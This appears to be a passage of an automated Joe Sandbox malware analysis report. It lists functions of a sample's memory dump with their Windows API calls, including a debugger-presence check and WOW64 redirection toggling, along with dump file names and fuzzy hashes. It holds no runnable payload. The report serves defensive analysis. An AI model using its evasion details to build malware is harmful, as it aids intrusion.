                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 834f89f6c82453c6f1e493659dbc5534204252555f205dab446f4ff5206c9192
                                                                                                                                                                                                                                                                              • Instruction ID: 05ef25f5e2c54da8f86fcd407a6103de06b8b8416eff8b1c556c993b53bf0f11
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 834f89f6c82453c6f1e493659dbc5534204252555f205dab446f4ff5206c9192
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C032D1B0A00209EFCB10EF54C885AAEB7F5FF05314F548659E915AB2D1D779ED80CB92
                                                                                                                                                                                                                                                                              Function 006F396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 006F3A3C
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                              • Opcode ID: 66dba7c8d3d86d78774719d8d4ecfcf2f584854b5069dc9b339347023bd3f9b1
                                                                                                                                                                                                                                                                              • Instruction ID: e5078dd8731b3e54aa18c7c6ab584643be928b54212a9beb527000f22bbda3e9
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66dba7c8d3d86d78774719d8d4ecfcf2f584854b5069dc9b339347023bd3f9b1
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62318470604705DFD320DF25D885BA7BBE8FB48304F00092EEAD987342E7B9A948CB56
                                                                                                                                                                                                                                                                              Function 006F331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • IsThemeActive.UXTHEME ref: 006F333D
                                                                                                                                                                                                                                                                                • Part of subcall function 006F32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 006F32FB
                                                                                                                                                                                                                                                                                • Part of subcall function 006F32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 006F3312
                                                                                                                                                                                                                                                                                • Part of subcall function 006F338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,006F3368,?), ref: 006F33BB
                                                                                                                                                                                                                                                                                • Part of subcall function 006F338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,006F3368,?), ref: 006F33CE
                                                                                                                                                                                                                                                                                • Part of subcall function 006F338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,007C2418,007C2400,?,?,?,?,?,?,006F3368,?), ref: 006F343A
                                                                                                                                                                                                                                                                                • Part of subcall function 006F338B: SetCurrentDirectoryW.KERNEL32(?,00000001,007C2418,?,?,?,?,?,?,?,006F3368,?), ref: 006F34BB
                                                                                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 006F3377
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                              • Opcode ID: 73820bce1aa9863b64a08ae0dd010c5291f485adda068e9da447bc8256282d5a
                                                                                                                                                                                                                                                                              • Instruction ID: 8f1652935c7a21be2ef954f711fd343755c473856cfc6795df3e0e849d6bfedd
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73820bce1aa9863b64a08ae0dd010c5291f485adda068e9da447bc8256282d5a
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5BF054735587D49FD711AF70FC0AF643B90A704709F10C81EBA09861E3CBBE45528B48
                                                                                                                                                                                                                                                                              Function 006FCAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 006FCEEE
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                              • Opcode ID: da2662477fc2d8216ff748d29bbcf2a5df70398f3bfedef4ef0f2f4ed5c85095
                                                                                                                                                                                                                                                                              • Instruction ID: 8a788179fa1d2b3eee8446d14a664c4f88570c8c995c981f88270b130722513d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da2662477fc2d8216ff748d29bbcf2a5df70398f3bfedef4ef0f2f4ed5c85095
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E932AE74A0020DDFDB10DF58C984EBAB7B6EF45364F158069EA15AB391C738ED81CB91
                                                                                                                                                                                                                                                                              Function 00777AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: LoadString
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                              • Opcode ID: dbf5e459da4eee8eabe69b1513abb94ead8161817b95847daf9fe92c65e864fd
                                                                                                                                                                                                                                                                              • Instruction ID: c734d8a63c9c528f005f4b2cafe28132a4080117880a606faa9b750e07645ea4
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbf5e459da4eee8eabe69b1513abb94ead8161817b95847daf9fe92c65e864fd
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28D15B75A04209EFCF18EF98C8819FDBBB5FF48350F148159E919AB291DB34AE41CB94
                                                                                                                                                                                                                                                                              Function 0071F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 6808343161d8064f190ea5853ae53b3af5baaad96865a9c9a4bdd0f0ef6eeb96
                                                                                                                                                                                                                                                                              • Instruction ID: 2612cba4ea91dbc7f1dfbc0908f4f63a70a6f3d7c2892cef1acfe4fdfc4e2c29
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6808343161d8064f190ea5853ae53b3af5baaad96865a9c9a4bdd0f0ef6eeb96
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A51A575A00218EFDB10DF6CC845AED7BB1BF85364F198168E8189B3D2D779AD82CB50
                                                                                                                                                                                                                                                                              Function 0075FCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 0075FCCE
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: BuffCharLower
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                              • Opcode ID: fd4fd78994f8da2f43e98192191c0d88bdef79138579d79f0b094fe2f8903d68
                                                                                                                                                                                                                                                                              • Instruction ID: 59a224e17cdee96f86889a0cfcfd7e698f20b288487f6eec44e83b5853226c64
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd4fd78994f8da2f43e98192191c0d88bdef79138579d79f0b094fe2f8903d68
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4541D672600309AFCB11EF68C8949EEB7B9EF44315B10453EE91297291EBB4DE45CB50
                                                                                                                                                                                                                                                                              Function 006F6679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,006F668B,?,?,006F62FA,?,00000001,?,?,00000000), ref: 006F664A
                                                                                                                                                                                                                                                                                • Part of subcall function 006F663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006F665C
                                                                                                                                                                                                                                                                                • Part of subcall function 006F663E: FreeLibrary.KERNEL32(00000000,?,?,006F668B,?,?,006F62FA,?,00000001,?,?,00000000), ref: 006F666E
                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,006F62FA,?,00000001,?,?,00000000), ref: 006F66AB
                                                                                                                                                                                                                                                                                • Part of subcall function 006F6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00735657,?,?,006F62FA,?,00000001,?,?,00000000), ref: 006F6610
                                                                                                                                                                                                                                                                                • Part of subcall function 006F6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006F6622
                                                                                                                                                                                                                                                                                • Part of subcall function 006F6607: FreeLibrary.KERNEL32(00000000,?,?,00735657,?,?,006F62FA,?,00000001,?,?,00000000), ref: 006F6635
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                              • Opcode ID: aef5becf72ace77f451f70561b6db9e1f6c0e7ac892dd65b7dc6ab4ebb30691b
                                                                                                                                                                                                                                                                              • Instruction ID: 458affe0c47e70b53ddda035b2dd374bb9930f2ad7cb514e44821e9fdb7111b1
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aef5becf72ace77f451f70561b6db9e1f6c0e7ac892dd65b7dc6ab4ebb30691b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A11E771640209AACF14BB24CC03BBD77A6AF50714F20442DF653E61C2DE75DA05DB69
                                                                                                                                                                                                                                                                              Function 00728782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: __wsopen_s
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                              • Opcode ID: c87a448bb16a3c4e03ec48a47716904979e91aa244a44facf14df7a931e869db
                                                                                                                                                                                                                                                                              • Instruction ID: 50943736a273889dda28cbef496f4c81e0e7ef4319c2ea431271788868b965d8
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c87a448bb16a3c4e03ec48a47716904979e91aa244a44facf14df7a931e869db
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 561118B590410AAFCB05DF98E94599A7BF4EF48310F114069F809AB311DA35EA218BA5
                                                                                                                                                                                                                                                                              Function 00725373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00724FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0072319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00725031
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 007253DF
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 614378929-0
                                                                                                                                                                                                                                                                              • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                              • Instruction ID: 390bc593011b96caa06a4f56b41e234de41021a151b587270b4fad20848e0d29
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC014972200314ABE331CF69E88595AFBEDEB85370F65051DE584832C1EB74A905C774
                                                                                                                                                                                                                                                                              Function 0071E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                              • Instruction ID: f011125eb65752d208447e49de89d726696278940928ff07e3b169702ababdbc
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4F0A932511624D6D7713A6EAC0D7DA32589F42334F140715F965971D1EA7CF88286D3
                                                                                                                                                                                                                                                                              Function 006FB329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 176396367-0
                                                                                                                                                                                                                                                                              • Opcode ID: 13e3f34f1ad86e8f32c6ece7b2ba72061abb35dc4d657d1d9fbb59e66f0b5d4f
                                                                                                                                                                                                                                                                              • Instruction ID: 28458b70e51d9ae8d22581105a6fdd3628d0268b83060c6eb13361690e55dc7a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13e3f34f1ad86e8f32c6ece7b2ba72061abb35dc4d657d1d9fbb59e66f0b5d4f
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3F02D73501708BEC7109F2CC80ABA6BB54EB44360F10812AF719CB1D0DB75E45087E0
                                                                                                                                                                                                                                                                              Function 0076F94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0076F987
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                              • Opcode ID: d78007d7982676bdddd11a9b335f34caae2e0ef611fb33d9285cc77d4b138a69
                                                                                                                                                                                                                                                                              • Instruction ID: f76e6eaf2ea5591f17514e23937193cc6b6c2510b1ae5f807cefe09b6099c16b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d78007d7982676bdddd11a9b335f34caae2e0ef611fb33d9285cc77d4b138a69
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22F03176600208BFCB11EBA5DC4AD9F77B9EF45720F004055F5059B2A1DE78AE81C795
                                                                                                                                                                                                                                                                              Function 00724FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0072319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00725031
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
